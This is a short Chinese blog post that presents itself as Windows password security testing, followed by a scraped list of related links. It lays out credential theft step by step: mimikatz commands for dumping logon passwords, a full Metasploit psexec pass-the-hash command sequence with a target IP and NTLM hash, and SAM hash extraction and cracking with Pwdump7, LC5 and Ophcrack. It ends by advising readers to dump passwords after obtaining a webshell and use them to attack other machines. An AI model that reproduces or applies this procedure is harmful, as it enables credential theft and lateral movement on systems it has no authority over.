windows密码安全性测试
1.、直接通过mimikatz读取管理员密码 :可以在cs里面找到这个工具,但是它只能读操作系统的密码。lazagne工具可以读所有密码(浏览器、操作系统、邮件系统的密码)。
找到.exe文件,然后放到c盘目录下:
第一条:privilege::debug //提升权限
第二条:sekurlsa::logonpa ssWords //抓取密码
2.本地hash远程攻击:只能在低版本的kali机上才能成功。在解密不了的情况下使用这种方法。hash值是可以直接进行登陆的,也就是说没有明文密码也可以进行登陆。
hash值的获取:1.在msf里面可以获取到。2.通过专业工具获取:以下是专业工具。需要将工具复制到虚拟机里面。
利用Hash远程登录系统 主要通过MSF提供的exploit/windows/smb/psexec 模块来完成。
msf >use exploit/windows/smb/psexec msf >set RHOST 192.168.1.109 msf >set SMBUser administrator msf >set SMBPass 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 msf >exploit msf >shell
本地hash暴力破解:
1.通过LC5暴力破解Hash密码 使用gmer直接提权SAM和system文件或用Pwdump7提取hash,最后使用LC5破解。
2、使用Ophcrack破解系统Hash密码 http://simeon.blog.51cto.com/18680/122160
需要将需要暴力破解的sam 、system.config两个文件复制到kali机内,对sam进行暴力破解,用到的工具是Ophcrack
注意:
1.在我们获得webshell后首先通过这些工具获取到操作系统密码。通过获得的密码攻击其他机器。
windows密码安全性测试相关推荐
- WEB安全性测试测试用例(基础).doc
原文地址为: WEB安全性测试测试用例(基础).doc 建立整体的威胁模型,测试溢出漏洞.信息泄漏.错误处理.SQL注入.身份验证和授权错误. 1.输入验证 客户端验证服务器端验证(禁用脚本调试,禁用 ...
- xmpp 服务器配置 open fire for windows 及 spark 测试
xmpp 服务器配置 open fire for windows 此文章为 XMPP windows服务器配置,使用的是 open fire 3.9.1.exe 1: 下载 open fire ope ...
- 江西省省赛中职网络安全-Windows操作系统渗透测试
9:Windows操作系统渗透测试 具体渗透方法观看视频即可 任务环境说明: 服务器场景:Server05 服务器场景操作系统:Windows(版本不详)(封闭靶机) 通过本地PC中渗透测试平 ...
- 计算机密码是空的怎么重置,电脑忘记开机登录密码怎么办? Windows 密码重置 - 合一学院...
[ 电脑忘记开机登录密码怎么办 ] 电脑很久没有用或者是刚设置好开机密码都很容易忘记,有些时候还会间歇性失忆会突然忘记密码,遇到这种情况重装系统又太麻烦,今天就就教大家怎样重置电脑的密码. 测试的系统 ...
- APP测试之安全性测试
一.前言 在SDK最近的项目中上线的包被第三方杀毒软件报出有病毒的问题,后来经过查验发现是SDK悬浮窗动画的逻辑被检验出有病毒,最后进行了修改.事情虽然解决了,但是引起该问题的一个原因是在测试中没有安 ...
- 软件测试-------Web(性能测试 / 界面测试 / 兼容性测试 / 安全性测试)
Web(性能测试 / 界面测试 / 兼容性测试 / 安全性测试) 一.Web性能测试:(压力测试.负载测试.连接速度测试) 1.压力测试: 并发测试 (如500人同时登录邮箱) 2.负载测试 ...
- 软件测试·系统测试·安全性测试
软件测试主要是为了测试发现软件系统中的BUG,并进行改正,以保证在软件交付给客户是能够保证客户需求达到实现.但在交付之后,并不意味着软件就不会再出现错误,哪怕软件的运行BUG已经完全被解决,而病毒及非 ...
- 安全性测试应该从那几个方面进行?
软件的安全性应从哪几个方面去测试? 软件安全性测试包括程序.数据库安全性测试.根据系统安全指标不同测试策略也不同. 用户认证安全的测试要考虑问题: 明确区分系统中不同用户权限 . 系统中会不会出现用户 ...
- Windows端 USBIP测试
Windows端 USBIP测试 注:-- 写在前面: 其实USBIP最开始的时候只是用在Linux端的, 具体是如下: Windows端只可以作为客户端, 不可以做为服务端 Linux端既可以作为客 ...
最新文章
- 关于(++i)+(++i)+(++i)与(++i)+(i++)与(i++)+(++i)
- 自带中心调整的电单车模型-DongGuan BDS
- AndroidStudio导入项目一直卡在Building gradle project info最快速解决方案
- SQL笛卡尔积结合前后行数据的统计案例
- AD域策略启动关机脚本不执行的注意事项
- 读书笔记 effective c++ Item 41 理解隐式接口和编译期多态
- s信网页版rver定时任务mysql_DataX Web2.0发布,集成定时任务,支持分布式
- 以用户为中心的SNS站点数据库设计及实现
- 【bzoj1699/USACO2007】Balanced Lineup排队——RMQ问题
- Python数据结构与算法视频教程-王宁宁-专题视频课程
- 破解Photoshop CC
- 3.SPSS Modeler数据基本分析笔记
- 【Jmeter+ant+Jenkins自动化持续集成】
- java大小写金额转换_java将金额转化为大写金额
- 【小峰の题单】网络流经典题目
- fx5u 脉冲输出指令PLSY(DPLSY)4种写法
- C++:链表(初识链表)
- [非技术]-电话面试感想
- cephfs创建和删除pool
- 一个普通码农无法避免的时代碾压